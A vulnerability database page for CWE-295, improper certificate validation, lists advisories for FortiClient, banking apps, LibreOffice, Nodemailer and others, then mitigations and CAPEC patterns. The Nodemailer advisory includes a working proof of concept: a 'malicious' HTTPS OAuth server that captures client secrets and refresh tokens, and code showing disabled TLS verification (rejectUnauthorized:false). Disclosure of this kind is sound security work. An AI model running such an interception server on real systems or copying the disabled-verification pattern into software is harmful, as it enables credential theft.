CWE-295
AllowedImproper Certificate Validation
Abstraction: Base · Status: Draft
The product does not validate, or incorrectly validates, a certificate.
1906 vulnerabilities reference this CWE, most recent first.
GHSA-R657-X7W7-Q6J3
Vulnerability from github – Published: 2024-09-10 15:31 – Updated: 2024-09-26 15:30An improper certificate validation vulnerability [CWE-295] in FortiClientWindows 6.4 all versions, 7.0.0 through 7.0.7, FortiClientMac 6.4 all versions, 7.0 all versions, 7.2.0 through 7.2.4, FortiClientLinux 6.4 all versions, 7.0 all versions, 7.2.0 through 7.2.4, FortiClientAndroid 6.4 all versions, 7.0 all versions, 7.2.0 and FortiClientiOS 5.6 all versions, 6.0.0 through 6.0.1, 7.0.0 through 7.0.6 SAML SSO feature may allow an unauthenticated attacker to man-in-the-middle the communication between the FortiClient and both the service provider and the identity provider.
{
"affected": [],
"aliases": [
"CVE-2022-45856"
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-09-10T15:15:13Z",
"severity": "MODERATE"
},
"details": "An improper certificate validation vulnerability [CWE-295] in FortiClientWindows 6.4 all versions, 7.0.0 through 7.0.7, FortiClientMac 6.4 all versions, 7.0 all versions, 7.2.0 through 7.2.4, FortiClientLinux 6.4 all versions, 7.0 all versions, 7.2.0 through 7.2.4, FortiClientAndroid 6.4 all versions, 7.0 all versions, 7.2.0 and FortiClientiOS 5.6 all versions, 6.0.0 through 6.0.1, 7.0.0 through 7.0.6 SAML SSO feature may allow an unauthenticated attacker to\u00a0man-in-the-middle the communication between the FortiClient and\u00a0 both the service provider and the identity provider.",
"id": "GHSA-r657-x7w7-q6j3",
"modified": "2024-09-26T15:30:33Z",
"published": "2024-09-10T15:31:04Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45856"
},
{
"type": "WEB",
"url": "https://fortiguard.fortinet.com/psirt/FG-IR-22-230"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-R6P3-G585-326C
Vulnerability from github – Published: 2022-05-17 02:39 – Updated: 2025-04-20 03:39The avb-bank-mobile-banking/id592565443 app 3.0.0 for iOS does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
{
"affected": [],
"aliases": [
"CVE-2017-9567"
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-06-16T12:29:00Z",
"severity": "MODERATE"
},
"details": "The avb-bank-mobile-banking/id592565443 app 3.0.0 for iOS does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.",
"id": "GHSA-r6p3-g585-326c",
"modified": "2025-04-20T03:39:12Z",
"published": "2022-05-17T02:39:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-9567"
},
{
"type": "WEB",
"url": "https://medium.com/%40chronic_9612/advisory-44-credit-union-apps-for-ios-may-allow-login-credential-exposure-4d2f380b85c5"
},
{
"type": "WEB",
"url": "https://medium.com/@chronic_9612/advisory-44-credit-union-apps-for-ios-may-allow-login-credential-exposure-4d2f380b85c5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-R6QH-J42J-PW64
Vulnerability from github – Published: 2024-07-31 21:32 – Updated: 2024-08-06 21:57An issue in beego v.2.2.0 and before allows a remote attacker to escalate privileges via the sendMail function located in the beego/core/logs/smtp.go file.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/beego/beego/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.2.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-40464"
],
"database_specific": {
"cwe_ids": [
"CWE-295",
"CWE-599"
],
"github_reviewed": true,
"github_reviewed_at": "2024-08-01T13:34:50Z",
"nvd_published_at": "2024-07-31T21:15:17Z",
"severity": "HIGH"
},
"details": "An issue in beego v.2.2.0 and before allows a remote attacker to escalate privileges via the `sendMail` function located in the `beego/core/logs/smtp.go` file.",
"id": "GHSA-r6qh-j42j-pw64",
"modified": "2024-08-06T21:57:12Z",
"published": "2024-07-31T21:32:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/beego/beego/security/advisories/GHSA-6g9p-wv47-4fxq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40464"
},
{
"type": "WEB",
"url": "https://github.com/beego/beego/commit/8f89e12e6cafb106d5c201dbc3b2a338bfde74e2"
},
{
"type": "WEB",
"url": "https://gist.github.com/nyxfqq/b53b0148b9aa040de63f58a68fd11445"
},
{
"type": "PACKAGE",
"url": "https://github.com/beego/beego"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Beego privilege escalation vulnerability"
}
GHSA-R73F-2RXH-PRFM
Vulnerability from github – Published: 2025-03-21 15:31 – Updated: 2025-12-10 21:31An Improper Certificate Validation vulnerability in LibreOffice allowed an attacker to self sign an ODF document, with a signature untrusted by the target, then modify it to change the signature algorithm to an invalid (or unknown to LibreOffice) algorithm and LibreOffice would incorrectly present such a signature with an unknown algorithm as a valid signature issued by a trusted person
This issue affects LibreOffice: from 7.0 before 7.0.5, from 7.1 before 7.1.1.
{
"affected": [],
"aliases": [
"CVE-2021-25635"
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-21T15:15:35Z",
"severity": "MODERATE"
},
"details": "An Improper Certificate Validation vulnerability in LibreOffice allowed \nan attacker to self sign an ODF document, with a signature untrusted by \nthe target, then modify it to change the signature algorithm to an \ninvalid (or unknown to LibreOffice) algorithm and LibreOffice would incorrectly present such a signature with an unknown algorithm as a \nvalid signature issued by a trusted person\n\n\nThis issue affects LibreOffice: from 7.0 before 7.0.5, from 7.1 before 7.1.1.",
"id": "GHSA-r73f-2rxh-prfm",
"modified": "2025-12-10T21:31:28Z",
"published": "2025-03-21T15:31:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25635"
},
{
"type": "WEB",
"url": "https://www.libreoffice.org/about-us/security/advisories/cve-2021-25635"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-R79F-WXVR-PQ9R
Vulnerability from github – Published: 2022-02-11 00:00 – Updated: 2022-03-17 00:05A CWE-295: Improper Certificate Validation vulnerability exists that could allow a Man-in-theMiddle attack when communications between the client and Geo SCADA database server are intercepted. Affected Product: ClearSCADA (All Versions), EcoStruxure Geo SCADA Expert 2019 (All Versions), EcoStruxure Geo SCADA Expert 2020 (All Versions)
{
"affected": [],
"aliases": [
"CVE-2022-24320"
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-02-09T23:15:00Z",
"severity": "MODERATE"
},
"details": "A CWE-295: Improper Certificate Validation vulnerability exists that could allow a Man-in-theMiddle attack when communications between the client and Geo SCADA database server are intercepted. Affected Product: ClearSCADA (All Versions), EcoStruxure Geo SCADA Expert 2019 (All Versions), EcoStruxure Geo SCADA Expert 2020 (All Versions)",
"id": "GHSA-r79f-wxvr-pq9r",
"modified": "2022-03-17T00:05:45Z",
"published": "2022-02-11T00:00:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24320"
},
{
"type": "WEB",
"url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2022-039-05"
},
{
"type": "WEB",
"url": "https://github.com/mandiant/Vulnerability-Disclosures/blob/master/2022/MNDT-2022-0019/MNDT-2022-0019.md"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-R7G4-QG5F-QQM2
Vulnerability from github – Published: 2026-06-15 17:34 – Updated: 2026-06-15 17:34Summary
Nodemailer disables TLS certificate verification in its internal HTTPS fetch client through the use of rejectUnauthorized: false inside lib/fetch/index.js.
As a result, OAuth2 token requests trust invalid or self-signed HTTPS certificates and transmit sensitive OAuth credentials over connections that should fail TLS validation.
An attacker in a machine-in-the-middle position can intercept OAuth2 credential exchanges and capture:
- OAuth client_secret
- refresh_token
- access tokens
The issue was verified through runtime testing using a self-signed HTTPS OAuth endpoint.
Details
Root Cause
The issue originates from the internal HTTPS fetch implementation used by Nodemailer for OAuth2 token retrieval and related outbound HTTPS requests.
Inside:
lib/fetch/index.js
the request options contain:
rejectUnauthorized: false
This disables TLS peer certificate verification globally for the internal HTTPS client unless explicitly overridden through optional TLS configuration.
As a result:
- self-signed certificates are trusted
- invalid CA chains are accepted
- hostname validation is bypassed
- attacker-controlled HTTPS endpoints are treated as trusted
This violates expected HTTPS security guarantees.
Vulnerable Flow
The vulnerable execution chain is:
OAuth2 Transport ↓ XOAuth2 token generation ↓ Internal HTTPS fetch client ↓ HTTPS request with rejectUnauthorized:false ↓ Attacker-controlled/self-signed endpoint trusted ↓ OAuth credentials transmitted
PoC
Environment
Mail API (app/server.js)
const express = require("express");
const nodemailer = require("nodemailer");
require("dotenv").config();
const app = express();
app.use(express.json());
const transporter = nodemailer.createTransport({
host: process.env.SMTP_HOST,
port: process.env.SMTP_PORT,
secure: false,
auth: {
user: process.env.SMTP_USER,
pass: process.env.SMTP_PASS
}
});
app.post("/send", async (req, res) => {
try {
const { to, subject, text, html } = req.body;
const info = await transporter.sendMail({
from: `"Mailer" <${process.env.SMTP_USER}>`,
to,
subject,
text,
html
});
res.json({
success: true,
messageId: info.messageId
});
} catch (err) {
console.error(err);
res.status(500).json({
success: false,
error: err.message
});
}
});
app.listen(process.env.PORT, () => {
console.log(`Mailer running on port ${process.env.PORT}`);
});
Malicious HTTPS OAuth Server (poc/evil-oauth.js)
const https = require('https');
const fs = require('fs');
https.createServer({
key: fs.readFileSync('./key.pem'),
cert: fs.readFileSync('./cert.pem')
}, (req, res) => {
console.log('\n==== REQUEST INTERCEPTED ====');
console.log(req.method, req.url);
let body = '';
req.on('data', chunk => {
body += chunk;
});
req.on('end', () => {
console.log('\nPOST BODY:');
console.log(body);
res.writeHead(200, {
'Content-Type': 'application/json'
});
res.end(JSON.stringify({
access_token: 'attacker_token',
expires_in: 3600
}));
});
}).listen(8443, () => {
console.log('Malicious HTTPS OAuth server listening on 8443');
});
Nodemailer OAuth2 Test (test.js)
const nodemailer = require('./');
const transporter = nodemailer.createTransport({
service: 'gmail',
auth: {
type: 'OAuth2',
user: 'redacted@example.com',
clientId: 'CLIENT_ID_REDACTED',
clientSecret: 'CLIENT_SECRET_REDACTED',
refreshToken: 'REFRESH_TOKEN_REDACTED',
accessUrl: 'https://localhost:8443/token'
}
});
transporter.sendMail({
from: 'redacted@example.com',
to: 'redacted@example.com',
subject: 'PoC',
text: 'test'
}, (err, info) => {
console.log('\n==== NODEMAILER RESULT ====');
if (err) {
console.error(err);
} else {
console.log(info);
}
});
Steps to Reproduce
- Start malicious HTTPS OAuth server:
- node poc/evil-oauth.js
- Run Nodemailer OAuth2 test:
- node test.js
- Observe intercepted OAuth2 request body on the malicious HTTPS server.
PIC
Impact
- OAuth credential theft
- unauthorized email access
- persistent token abuse
- unauthorized mail sending
- mailbox compromise
- interception/tampering of OAuth responses
The issue effectively downgrades HTTPS security protections for sensitive OAuth credential exchanges.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 8.0.7"
},
"package": {
"ecosystem": "npm",
"name": "nodemailer"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "8.0.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-15T17:34:48Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\nNodemailer disables TLS certificate verification in its internal HTTPS fetch client through the use of rejectUnauthorized: false inside lib/fetch/index.js.\n\nAs a result, OAuth2 token requests trust invalid or self-signed HTTPS certificates and transmit sensitive OAuth credentials over connections that should fail TLS validation.\n\nAn attacker in a machine-in-the-middle position can intercept OAuth2 credential exchanges and capture:\n\n- OAuth client_secret\n- refresh_token\n- access tokens\n\nThe issue was verified through runtime testing using a self-signed HTTPS OAuth endpoint.\n\n### Details\nRoot Cause\n\nThe issue originates from the internal HTTPS fetch implementation used by Nodemailer for OAuth2 token retrieval and related outbound HTTPS requests.\n\nInside:\n\n`lib/fetch/index.js`\n\nthe request options contain:\n\n`rejectUnauthorized: false`\n\nThis disables TLS peer certificate verification globally for the internal HTTPS client unless explicitly overridden through optional TLS configuration.\n\nAs a result:\n\n- self-signed certificates are trusted\n- invalid CA chains are accepted\n- hostname validation is bypassed\n- attacker-controlled HTTPS endpoints are treated as trusted\n\nThis violates expected HTTPS security guarantees.\n\n**Vulnerable Flow**\n\nThe vulnerable execution chain is:\n\nOAuth2 Transport\n \u2193\nXOAuth2 token generation\n \u2193\nInternal HTTPS fetch client\n \u2193\nHTTPS request with rejectUnauthorized:false\n \u2193\nAttacker-controlled/self-signed endpoint trusted\n \u2193\nOAuth credentials **transmitted**\n\n\n### PoC\n**Environment**\n#### Mail API (app/server.js)\n```\nconst express = require(\"express\");\nconst nodemailer = require(\"nodemailer\");\nrequire(\"dotenv\").config();\n\nconst app = express();\n\napp.use(express.json());\n\nconst transporter = nodemailer.createTransport({\n host: process.env.SMTP_HOST,\n port: process.env.SMTP_PORT,\n secure: false,\n auth: {\n user: process.env.SMTP_USER,\n pass: process.env.SMTP_PASS\n }\n});\n\napp.post(\"/send\", async (req, res) =\u003e {\n try {\n const { to, subject, text, html } = req.body;\n\n const info = await transporter.sendMail({\n from: `\"Mailer\" \u003c${process.env.SMTP_USER}\u003e`,\n to,\n subject,\n text,\n html\n });\n\n res.json({\n success: true,\n messageId: info.messageId\n });\n\n } catch (err) {\n console.error(err);\n res.status(500).json({\n success: false,\n error: err.message\n });\n }\n});\n\napp.listen(process.env.PORT, () =\u003e {\n console.log(`Mailer running on port ${process.env.PORT}`);\n});\n```\n\n#### Malicious HTTPS OAuth Server (poc/evil-oauth.js)\n\n```\nconst https = require(\u0027https\u0027);\nconst fs = require(\u0027fs\u0027);\n\nhttps.createServer({\n key: fs.readFileSync(\u0027./key.pem\u0027),\n cert: fs.readFileSync(\u0027./cert.pem\u0027)\n}, (req, res) =\u003e {\n\n console.log(\u0027\\n==== REQUEST INTERCEPTED ====\u0027);\n console.log(req.method, req.url);\n\n let body = \u0027\u0027;\n\n req.on(\u0027data\u0027, chunk =\u003e {\n body += chunk;\n });\n\n req.on(\u0027end\u0027, () =\u003e {\n\n console.log(\u0027\\nPOST BODY:\u0027);\n console.log(body);\n\n res.writeHead(200, {\n \u0027Content-Type\u0027: \u0027application/json\u0027\n });\n\n res.end(JSON.stringify({\n access_token: \u0027attacker_token\u0027,\n expires_in: 3600\n }));\n });\n\n}).listen(8443, () =\u003e {\n console.log(\u0027Malicious HTTPS OAuth server listening on 8443\u0027);\n});\n```\n\n#### Nodemailer OAuth2 Test (test.js)\n\n```\nconst nodemailer = require(\u0027./\u0027);\n\nconst transporter = nodemailer.createTransport({\n service: \u0027gmail\u0027,\n\n auth: {\n type: \u0027OAuth2\u0027,\n\n user: \u0027redacted@example.com\u0027,\n\n clientId: \u0027CLIENT_ID_REDACTED\u0027,\n clientSecret: \u0027CLIENT_SECRET_REDACTED\u0027,\n\n refreshToken: \u0027REFRESH_TOKEN_REDACTED\u0027,\n\n accessUrl: \u0027https://localhost:8443/token\u0027\n }\n});\n\ntransporter.sendMail({\n from: \u0027redacted@example.com\u0027,\n to: \u0027redacted@example.com\u0027,\n subject: \u0027PoC\u0027,\n text: \u0027test\u0027\n\n}, (err, info) =\u003e {\n\n console.log(\u0027\\n==== NODEMAILER RESULT ====\u0027);\n\n if (err) {\n console.error(err);\n } else {\n console.log(info);\n }\n});\n```\n**Steps to Reproduce**\n\n- Start malicious HTTPS OAuth server:\n- node poc/evil-oauth.js\n- Run Nodemailer OAuth2 test:\n- node test.js\n- Observe intercepted OAuth2 request body on the malicious HTTPS server.\n\n**PIC**\n\u003cimg width=\"1919\" height=\"1029\" alt=\"image\" src=\"https://github.com/user-attachments/assets/fdeafeb4-c0c5-49f8-beeb-e7f945be0516\" /\u003e\n\n### Impact\n\n- OAuth credential theft\n- unauthorized email access\n- persistent token abuse\n- unauthorized mail sending\n- mailbox compromise\n- interception/tampering of OAuth responses\n\nThe issue effectively downgrades HTTPS security protections for sensitive OAuth credential exchanges.",
"id": "GHSA-r7g4-qg5f-qqm2",
"modified": "2026-06-15T17:34:48Z",
"published": "2026-06-15T17:34:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-r7g4-qg5f-qqm2"
},
{
"type": "PACKAGE",
"url": "https://github.com/nodemailer/nodemailer"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Nodemailer: Improper TLS Certificate Validation in OAuth2 Token Fetch Enables Credential Interception"
}
GHSA-R7H7-HC5W-P3VW
Vulnerability from github – Published: 2022-05-17 02:39 – Updated: 2025-04-20 03:39The mount-vernon-bank-trust-mobile-banking/id542706679 app 3.0.0 for iOS does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
{
"affected": [],
"aliases": [
"CVE-2017-9570"
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-06-16T12:29:00Z",
"severity": "MODERATE"
},
"details": "The mount-vernon-bank-trust-mobile-banking/id542706679 app 3.0.0 for iOS does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.",
"id": "GHSA-r7h7-hc5w-p3vw",
"modified": "2025-04-20T03:39:12Z",
"published": "2022-05-17T02:39:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-9570"
},
{
"type": "WEB",
"url": "https://medium.com/%40chronic_9612/advisory-44-credit-union-apps-for-ios-may-allow-login-credential-exposure-4d2f380b85c5"
},
{
"type": "WEB",
"url": "https://medium.com/@chronic_9612/advisory-44-credit-union-apps-for-ios-may-allow-login-credential-exposure-4d2f380b85c5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-R872-MGGQ-8GFH
Vulnerability from github – Published: 2022-05-14 03:23 – Updated: 2022-05-14 03:23Botan 2.2.0 - 2.4.0 (fixed in 2.5.0) improperly handled wildcard certificates and could accept certain certificates as valid for hostnames when, under RFC 6125 rules, they should not match. This only affects certificates issued to the same domain as the host, so to impersonate a host one must already have a wildcard certificate matching other hosts in the same domain. For example, b*.example.com would match some hostnames that do not begin with a 'b' character.
{
"affected": [],
"aliases": [
"CVE-2018-9127"
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-04-02T17:29:00Z",
"severity": "CRITICAL"
},
"details": "Botan 2.2.0 - 2.4.0 (fixed in 2.5.0) improperly handled wildcard certificates and could accept certain certificates as valid for hostnames when, under RFC 6125 rules, they should not match. This only affects certificates issued to the same domain as the host, so to impersonate a host one must already have a wildcard certificate matching other hosts in the same domain. For example, b*.example.com would match some hostnames that do not begin with a \u0027b\u0027 character.",
"id": "GHSA-r872-mggq-8gfh",
"modified": "2022-05-14T03:23:44Z",
"published": "2022-05-14T03:23:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-9127"
},
{
"type": "WEB",
"url": "https://botan.randombit.net/security.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-R8F7-9PFQ-MJMV
Vulnerability from github – Published: 2022-02-09 22:22 – Updated: 2023-04-21 19:18Certificate validation in node-sass 2.0.0 to 6.0.1 is disabled when requesting binaries even if the user is not specifying an alternative download path.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "node-sass"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "7.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-24025"
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"github_reviewed": true,
"github_reviewed_at": "2021-04-06T22:18:40Z",
"nvd_published_at": "2021-01-11T19:15:00Z",
"severity": "MODERATE"
},
"details": "Certificate validation in node-sass 2.0.0 to 6.0.1 is disabled when requesting binaries even if the user is not specifying an alternative download path.",
"id": "GHSA-r8f7-9pfq-mjmv",
"modified": "2023-04-21T19:18:26Z",
"published": "2022-02-09T22:22:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-24025"
},
{
"type": "WEB",
"url": "https://github.com/sass/node-sass/issues/3067"
},
{
"type": "WEB",
"url": "https://github.com/sass/node-sass/pull/3149"
},
{
"type": "WEB",
"url": "https://github.com/sass/node-sass/pull/567#issuecomment-656609236"
},
{
"type": "WEB",
"url": "https://github.com/sass/node-sass/commit/0a21792803639851b480fbd8cbcb5540ef974387"
},
{
"type": "PACKAGE",
"url": "https://github.com/sass/node-sass"
},
{
"type": "WEB",
"url": "https://github.com/sass/node-sass/releases/tag/v7.0.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Improper Certificate Validation in node-sass"
}
GHSA-R8GR-36V8-M732
Vulnerability from github – Published: 2025-09-17 18:31 – Updated: 2025-09-17 18:31CISA Thorium does not validate TLS certificates when connecting to Elasticsearch. An unauthenticated attacker with access to a Thorium cluster could impersonate the Elasticsearch service. Fixed in 1.1.2.
{
"affected": [],
"aliases": [
"CVE-2025-35434"
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-17T17:15:43Z",
"severity": "LOW"
},
"details": "CISA Thorium does not validate TLS certificates when connecting to Elasticsearch. An unauthenticated attacker with access to a Thorium cluster could impersonate the Elasticsearch service. Fixed in 1.1.2.",
"id": "GHSA-r8gr-36v8-m732",
"modified": "2025-09-17T18:31:18Z",
"published": "2025-09-17T18:31:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-35434"
},
{
"type": "WEB",
"url": "https://github.com/cisagov/thorium/blob/main/api/src/models/backends/setup/elastic_setup.rs#L36-L43"
},
{
"type": "WEB",
"url": "https://github.com/cisagov/thorium/releases/tag/1.1.2"
},
{
"type": "WEB",
"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-259-01.json"
},
{
"type": "WEB",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-35434"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
Mitigation
Certificates should be carefully managed and checked to assure that data are encrypted with the intended owner's public key.
Mitigation
If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the hostname.
CAPEC-459: Creating a Rogue Certification Authority Certificate
An adversary exploits a weakness resulting from using a hashing algorithm with weak collision resistance to generate certificate signing requests (CSR) that contain collision blocks in their "to be signed" parts. The adversary submits one CSR to be signed by a trusted certificate authority then uses the signed blob to make a second certificate appear signed by said certificate authority. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the adversary's second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority.
CAPEC-475: Signature Spoofing by Improper Validation
An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.